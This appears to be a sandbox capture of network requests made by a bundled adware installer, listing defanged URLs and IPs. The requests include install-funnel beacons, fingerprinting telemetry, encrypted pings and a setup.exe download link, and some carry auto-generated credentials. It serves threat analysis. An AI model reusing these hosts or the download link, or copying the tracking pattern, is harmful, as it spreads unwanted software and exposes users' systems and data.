hxxp://rep.shopper-pro.com/app/ping.ashx?e=fx25sIC5hWOfZNC1TqAoBLUntwt5bxURTEgCpOx0T0GQL2F0hg1RiTdGGPs8AIHkGuSf5ccJqhPvYQ7YSDf5fSyjQRapHyYcv34ni8kUorY0A75TMG4v BbKdUb4fSU3inFskWrXAmXG4Lnbcm9hh1KSSkgkzJM10ClxJsX5qO1ZySIyJVh8l6AwGw39X SP66QyS6DOQJjDeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6Okd10EwQxdzjoDxJ w6ryxW8= 54.197.238.106
hxxp://logs.neomapobjectrack.com/monetization.gif?event=3&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000805&country=ua&app=70299&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147 69.16.175.42
hxxp://www.appshat.com/thumbnails/icon/images/assets/b/b/bbbde9554589bda63791709a6785e0a3.png 78.138.127.8
hxxp://sub.goveba.info/pinger?event_type=install_complete&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=appshat_madness&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=4&index_in_screen=1&index_in_session=4&0.36330831864320045 54.192.47.181
hxxp://rep.shopper-pro.com/app/ping.ashx?e=s5Ydxb c7o0asVMAMALcPL0oSfJOuBg0J7P3DAC8IMDZhN5o5pkk8XKxIhAz9YyqMSx1JGlNOutOeXK1HgKvEMUWbVgwixNWcSwZ6/LEwZLppMdrwPpmw3scS/rum0dyUP gGlRflyueXXE4oNm6FfjcbTVOKlb2t5UU9B7DBN2oXYru/dbHg/eJIUUI29KJua/YhbaaQtbhLKDJ7gHH44roFtpr/bY5GbVYBUSgIm940bIUeotQDrkRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtYj3YOinLgXsemrvcVl0Mf/w== 54.197.238.106
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1429400154 54.231.1.140
hxxp://logs.neomapobjectrack.com/monetization.gif?event=4&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000171&country=ua&app=70121&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147 69.16.175.42
hxxp://online.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=e59a543c-07c1-4575-b0a1-b17d7cfac7a7&Password=l6G2E4Yn&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400137&SBPIDS=1&KA=1 212.143.22.214
hxxp://stats.neomapobjectrack.com/installer.gif?action=started&app=65743&appver=0&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_43&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=85899350029&asw=0&asw2=1082139141&asw3=-2147475456&asw4=34816&crtnm=na&mdat=&procstarttime=1429400187&procruntime=2&rnd=1429400189 54.231.17.116
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=700&n=deploy_ch_start_funnel_step_name&rnd=1429400192 54.231.1.140
hxxp://errors.neomapobjectrack.com/installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&error=0&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=3&rnd=1429400150 54.231.1.140
hxxp://www.appshat.com/thumbnails/icon/images/assets/f/4/f4e4b853ddab3b763f0af17d513631bd.png 78.138.127.8
hxxp://stats.neomapobjectrack.com/apps.gif?action=install&app=65743&appver=&ver=1_36_01_22&version_date=15-04-17&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C9FC24CEAAF94660B86494E2129E945CPI&srcid=000820&subid=0&zdata=appshatmadness&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1429400187&lifetime=0&silent=1&crtnm=na&procstarttime=1429400187&procruntime=10&rnd=1429400197 54.231.17.116
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo= 23.51.123.27
hxxp://www.appshat.com/thumbnails/banner/images/assets/1/3/13a052a6d8c62b7831aa10e2f6f37454.jpg 78.138.127.8
hxxp://www.appshat.com/thumbnails/icon/images/assets/5/9/59982d8527c0da41e35817e8fc15c0fc.png 78.138.127.8
hxxp://logs.neomapobjectrack.com/monetization.gif?event=4&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400187&asw=0_1082139141_-2147475456_34816&browser=ff&rnd=1429400187 69.16.175.42
hxxp://sub.goveba.info/pinger?event_type=install_start&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=appshat_madness&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=4&index_in_screen=1&index_in_session=4&0.7184957306003938 54.192.47.181
hxxp://online.GOOBZO.com/online/RegisterAnon.aspx?ProductID=12000&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=
hxxp://sub.goveba.info/pinger?event_type=install_fail&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=swiftrecord&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=2&index_in_screen=1&index_in_session=2&0.7535562975350745 54.192.47.181
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=300&n=deploy_start_funnel_step_name&rnd=1429400151 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1429400158 54.231.1.140
hxxp://www.appshat.com/thumbnails/icon/images/assets/5/d/5dbc29649669598ff43174b9ee730008.png 78.138.127.8
hxxp://online.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400136&SBPIDS=1&KA=1 212.143.22.214
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1429400159 54.231.1.140
hxxp://logs.neomapobjectrack.com/monetization.gif?event=3&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000171&country=ua&app=70121&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147 69.16.175.42
hxxp://repjs.shopper-pro.com/app/ping.ashx?e=KSz5qzb2KgLn7OfBI/VPcf3K4Um6afGye03i94NAiM/7RH4w/5EvdUqAWhGQi7pGk2HxL2Lh3QcuaAaDgF1REpvc5fUfFrFJRvaTpGfz3xhcJKC1Reo3n9ppTNOjE5 LPSZuizlKZS4vVGidJQzQbwcX153juosl0uSr4audwd7JcEM/wt3T7JEXnUcAfrYQJW8Pwf ylt73/90jJ3cYYbs0smGVcCm2M/VB50wH9zL8Hq6Ocmu0jR8nfSY9YHcwn0GoGPKVvkGO3oOCw2fE7BRuaRLHbXnuZP /RqMPfI= 54.197.238.106
hxxp://online.GOOBZO.com/online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400136&SBPIDS=1&KA=1
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= 23.51.123.27
hxxp://www.appshat.com/css/product.css 78.138.127.8
hxxp://logs.neomapobjectrack.com/monetization.gif?event=4&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000805&country=ua&app=70299&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147 69.16.175.42
hxxp://ocsp2.globalsign.com/gscodesigng2/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRruLd2WRFk6cRYGFIqkQ4J8hxDogQUCG7YtpyKv+0+18N0XcyAH6gvUHoCEhEhZ1N/ArcYWNWqP8XWy7QmXA== 108.162.232.205
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=100&n=init_start_funnel_step_name&rnd=1429400147 54.231.1.140
hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECECVRccvD8Qb29B4D63fPT+k= 23.51.123.27
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=200&n=init_end_funnel_step_name&rnd=1429400150 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=500&n=deploy_notification_start_funnel_step_name&rnd=1429400191 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1429400194 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=300&n=deploy_start_funnel_step_name&rnd=1429400151 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1429400153 54.231.1.140
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?4124f9eb17acfe32 87.245.216.25
hxxp://www.appshat.com/thumbnails/banner/images/assets/1/f/1f8ffa22b53dfc2f6b7f1850bb6b73e8.png 78.138.127.8
hxxp://crl.microsoft.com/pki/crl/products/WinPCA.crl 87.245.216.57
hxxp://xqjdaibxl-g48pastf.netdna-ssl.com/t.ashx?e=IwLHwtP2rDe9KEnyTrgYNDpM WXU2ev5jA5kVqVgWdAgLxC0aXqYrYyox39H7ctI2j/LgkcsObQY7r2o/YNuRFi2s6XsF8NY17e6nA3xYScE8SFHLIEPsM3UKcKGG9ndxuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJc/JW5G9GpuGA== 198.232.124.192
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=200&n=init_end_funnel_step_name&rnd=1429400150 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1429400154 54.231.1.140
hxxp://www.google-analytics.com/r/collect?v=1&_v=j35&a=1886521082&t=pageview&_s=1&dl=http://www.appshat.com/home&ul=en-us&de=utf-8&dt=Apps Hat&sd=32-bit&sr=1716x901&vp=1018x770&je=0&_u=AEAAAAAAI~&jid=2102561798&cid=1223026756.1429400200&tid=UA-42656881-1&_r=1&z=866469168 216.58.209.206
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=900&n=deploy_ff_start_funnel_step_name&rnd=1429400192 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=10000&n=deploy_end_funnel_step_name&rnd=1429400161 54.231.1.140
hxxp://www.appshat.com/thumbnails/icon/images/assets/d/a/da84c206c2019448521379d2ff837774.png 78.138.127.8
hxxp://sub.goveba.info/pinger?event_type=install_start&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=youtubeaccelerator&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=1&index_in_screen=1&index_in_session=1&0.9877884424624551 54.192.47.181
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1429400159 54.231.1.140
hxxp://online.GOOBZO.com/online/Register.aspx?CV=2.0.0.0&ProductID=12000&UserID=&Password=&OS=10&EMail=&Newsletter=&V=3.3.9.5&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=
hxxp://sub.goveba.info/pinger?event_type=install_start&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=istartsurf&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=3&index_in_screen=1&index_in_session=3&0.4544383880033461 54.192.47.181
hxxp://stats.neomapobjectrack.com/apps.gif?action=install&app=70121&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C40EA91D545A44D7AC8E737686FDFCDBPI&srcid=000171&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl6dHNtdHljMCw4M2FiMGMzZS05OWRmLTQwOTgtODZkOS1lZjE1NTJhODZmNWUsIiwidW5xIjoiODNhYjBjM2UtOTlkZi00MDk4LTg2ZDktZWYxNTUyYTg2ZjVlIn19&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1429400147&lifetime=0&silent=1&crtnm=na&procstarttime=1429400147&procruntime=16&rnd=1429400163 54.231.17.116
hxxp://ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js 216.58.209.202
hxxp://www.google-analytics.com/analytics.js 216.58.209.206
hxxp://sub.goveba.info/pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=swiftrecord&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=2&index_in_screen=1&index_in_session=2&0.4368301195221277 54.192.47.181
hxxp://www.appshat.com/images/3.0stars.jpg 78.138.127.8
hxxp://d31kvmpgk4j074.cloudfront.net/images/Tokyo/tokyo_sprite_full.png 54.230.44.254
hxxp://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECEBILJd3le4hjatTZfSO5nIg= 23.51.123.27
hxxp://inno.bisrv.com/binno/get_pre_offering_checks?uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&v=2.1.1&affid=thetetrisgame&sid=thetetrisgameezsg&s=0 78.138.127.15
hxxp://www.appshat.com/js/scripts.js 78.138.127.8
hxxp://www.appshat.com/home 78.138.127.8
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=700&n=deploy_ch_start_funnel_step_name&rnd=1429400154 54.231.1.140
hxxp://sub.goveba.info/pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=istartsurf&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=3&index_in_screen=1&index_in_session=3&0.04203975819833361 54.192.47.181
hxxp://online.GOOBZO.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=0&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&ElapsedTime=1429400138&SBPIDS=1
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=10000&n=deploy_end_funnel_step_name&rnd=1429400159 54.231.1.140
hxxp://www.appshat.com/thumbnails/banner/images/assets/7/f/7fb9f4ca0fa96299334c18ee76c7b68b.jpg 78.138.127.8
hxxp://www.appshat.com/css/style.css 78.138.127.8
hxxp://www.appshat.com/images/5.0stars.jpg 78.138.127.8
hxxp://www.appshat.com/thumbnails/icon/images/assets/0/6/0692c2494a7331a77c05954f79c5480a.png 78.138.127.8
hxxp://rep.shopper-pro.com/app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBiYH9jylicula50u3XyigpVREcH6lvzpS2WA5XhQ4MoPBPFyFq4etD2F1daz2AcKxastnHeKqEA5dKHj74dJ/dxdnyqIR9QB0C 0KTRCdY9hVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSltjv7ItYHj4h8kpng0IpIJ 54.197.238.106
hxxp://clients1.google.com/ocsp 216.58.209.206
hxxp://rephelper.youtubeaccelerator.com/app/ping.ashx?e=043Mckb8LnjKYf/qJ5z9H SrE0ez3DjNOEav83SZIOEyIvs8NVvu9kXFDxkTgufFt5aWEmvF1lmyibNNhHQuhoY2d8FdDMrliViAEPFo6Yp/1ErfmLF8//Y1HJKKgNFGH6nxT6mrRhaKj C8ts/rBwTxchauHrQ9hdXWs9gHCsWrLZx3iqhAOXSh4 HSf3cXZ8qiEfUAdDFv3UUxaCmaxO5DUMAeJYUVsXXNrU8MbsN7/ITptlmJcAeXrDcfXn1
hxxp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl 87.245.216.57
hxxp://www.appshat.com/js/jquery.smooth-scroll.min.js 78.138.127.8
hxxp://rephelper.youtubeaccelerator.com/app/ping.ashx?e=657cd9m3NQFPNjxRBLtb4x0oukvXTQfet8f6YpiR28K/M iZRiJnRnHdTB6jkze/avGlMWAqZVF1vusSxtcPBYeCQx1we Asnw T2O19KvsYrNjjnOLU6dbIHx4MCRqKGvMeRdM8NsizZtFUmLk2U6syuDjWX8vLsJJPlhy2jdwTqcwBDTHruXFWs3G3PXIRsFG5pEsdtecdHUE6VB5Ib5M QBWR3ZtvIt9ltQ LwNUfJKZ4NCKSCQ==
hxxp://www.appshat.com/thumbnails/icon/images/assets/3/d/3d8bbea6bcae57d705c676f7050a7d51.png 78.138.127.8
hxxp://rep.shopper-pro.com/app/ping.ashx?e=s5Ydxb c7o0asVMAMALcPL0oSfJOuBg0J7P3DAC8IMDZhN5o5pkk8XKxIhAz9YyqMSx1JGlNOutOeXK1HgKvEMUWbVgwixNWcSwZ6/LEwZLppMdrwPpmw3scS/rum0dyUP gGlRflyueXXE4oNm6FfjcbTVOKlb2yahRH8NI3UnOryRtAxgTc80Ki/Lj0aHEBPFyFq4etD2F1daz2AcKxastnHeKqEA5dKHj74dJ/dxdnyqIR9QB0C 0KTRCdY9hVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSmc1BIhQjgGNR8kpng0IpIJ 54.197.238.106
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1429400159 54.231.1.140
hxxp://rep.shopper-pro.com/app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBq2mie6K97bhs4164GCUCrHY6 CMJNDnNYID5x5YtLWQpafL9ybUqF lhUgcG7ZBvd4qRXJPYOz 4i7hnHdhdcduQ/fd4pcRUO5yQynRUZI5Y08jY48xBJrw5bx1Bs6wXxOai4hHWpZ05BUTAhZFkj0WbcKfDrpl0bZGFcQYWFKUSuSWw6fC38LH/jy8G4FGJY4SiD403Los 54.197.238.106
hxxp://rephelper.youtubeaccelerator.com/app/ping.ashx?e=AZwPyJy3TZhPNjxRBLtb45HdX0JUIFUOt8f6YpiR28K/M iZRiJnRnHdTB6jkze/avGlMWAqZVF1vusSxtcPBYeCQx1we AsujghDckn/xgt lphzBReO6bK2Q7GGGnWJ281Et5v 1ivpBvzhFxOqDKzz2j1DKRExuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJegMBsN/V/kj2ANygAkC0Bha6lfIH DnKMZiwRfiQgeW Lmf6eHphUt9 inPTLZDtg=
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1429400158 54.231.1.140
hxxp://www.appshat.com/thumbnails/icon/images/assets/a/6/a6ae526a0a22dcfc743a66d44a3e09e3.png 78.138.127.8
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=500&n=deploy_notification_start_funnel_step_name&rnd=1429400153 54.231.1.140
hxxp://www.appshat.com/thumbnails/icon/images/assets/5/2/52d5414e7372639389ab7e9e4d479aee.png 78.138.127.8
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1429400153 54.231.1.140
hxxp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl 87.245.216.57
hxxp://online.GOOBZO.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=1&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=20131113143800&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&XMLUpdateFailed=0&ElapsedTime=1429400201&SBPIDS=1
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=10000&n=deploy_end_funnel_step_name&rnd=1429400195 54.231.1.140
hxxp://rep.shopper-pro.com/app/ping.ashx?e=yhrBLBbZM9WBOuidoZFbtbi3muUffR3jbLi6w5qijh6RoZJTpqsyZxASc9FSZWyoGYsEX4kIHlu/0mFZouDnPiqbL3WeaiLbzTMGWLRHpW9oALKR6u0dIX8SRNladdM9bXKriifhG9zxHHFV7tnwhkh7wLZ3uox395lwett3Vo8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlFdklJzkcUqd3Ih1Kfu IMReuT yH/uLbphiW/DYdUZuL1XwldYyi6o6OPzltHHEh4SKAFSm7JN4Dvl1Ie0NYsXYWYJZ2G1R01VmUCJgsNE AYCsljvoJNwjLw3VULpGjCmtL90K5JhMVO wnJbdjPvjIThxN S9EwTxchauHrQ9hdXWs9gHCsWrLZx3iqhAOXSh4 HSf3cXZ8qiEfUAdAvtCk0QnWPYVQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykpbY7 yLWB4 IfJKZ4NCKSCQ== 54.197.238.106
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000820&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1429400191 54.231.1.140
hxxp://www.appshat.com/thumbnails/icon/images/assets/7/e/7e5817bad781bbc2d2e43b350ccb53db.png 78.138.127.8
hxxp://download.mozilla.org/?product=firefox-34.0.5-complete&os=win&lang=en-US 63.245.215.111
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1429400159 54.231.1.140
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000805&i=900&n=deploy_ff_start_funnel_step_name&rnd=1429400154 54.231.1.140
hxxp://rep.shopper-pro.com/app/ping.ashx?e=s0jsdppK9OufZNC1TqAoBD8Ciqt5ctYfTEgCpOx0T0GQL2F0hg1RiTdGGPs8AIHkGuSf5ccJqhPvYQ7YSDf5fSyjQRapHyYcv34ni8kUorZmnaU FLUhgrONeuBglAqxQKd0GEgkaflVZ4RT0d23GHcO0aQLqLvPZ1qa tRBmxIEmumfnn3eLsmQ gNabH9smt1LIHE9GmAmMGUjfC0lQ4bieN4dwMAiQCgrTWge9c5pV1IGllrHIPLxQ3i9AquwzS5r6mtOURHi5n nh6YVLffopz0y2Q7Y 54.197.238.106
hxxp://xqjdaibxl-g48pastf.netdna-ssl.com/t.ashx?e=lOCrbsNL2zWQ5lb rGZVAri3muUffR3jI0kPktKhKyd4E7mrr1h80riKIFo3W8f23Wq7IsWCDz75CWDwEisd59aoPZj94HyTXeFaoUgIZNgjlVbxwk2 SY4G r 3F6T7Ye9UEEkdnkbYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW Q== 198.232.124.192
hxxp://errors.neomapobjectrack.com/utility.gif?report=fdata&f=1&c=000171&i=800&n=deploy_nova_start_funnel_step_name&rnd=1429400154 54.231.1.140
hxxp://fonts.gstatic.com/s/abel/v6/3YEwT2a1878zysq92S8_9w.eot 216.58.209.195
hxxp://sub.reasoninghollow.com/installers/bi_downloader/1429398342407/setup.exe 54.230.45.200
hxxp://www.appshat.com/thumbnails/icon/images/assets/5/8/589b1e936e1f038dc45bd8ffff59b359.png 78.138.127.8
hxxp://inno.bisrv.com/binno/xml?uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&v=2.1.1&affid=thetetrisgame&sid=thetetrisgameezsg&s=0 78.138.127.15
hxxp://rephelper.youtubeaccelerator.com/app/ping.ashx?e=AZwPyJy3TZhPNjxRBLtb45HdX0JUIFUOt8f6YpiR28K/M iZRiJnRnHdTB6jkze/avGlMWAqZVF1vusSxtcPBYeCQx1we AsujghDckn/xgt lphzBReO6bK2Q7GGGnWJ281Et5v 1gpJLLN2z FnwCiBUKcGrTX6nvOi2lZHZeM8MU7L6Z1XFzslN/Oom5DbE2hSZV1srvsrduYhMMj23LymH6HWKlXaBQc7HR56MWNJxXQawroNmbktPzt6FdqlmEIUPwTJ2qmrvcVl0Mf/w==
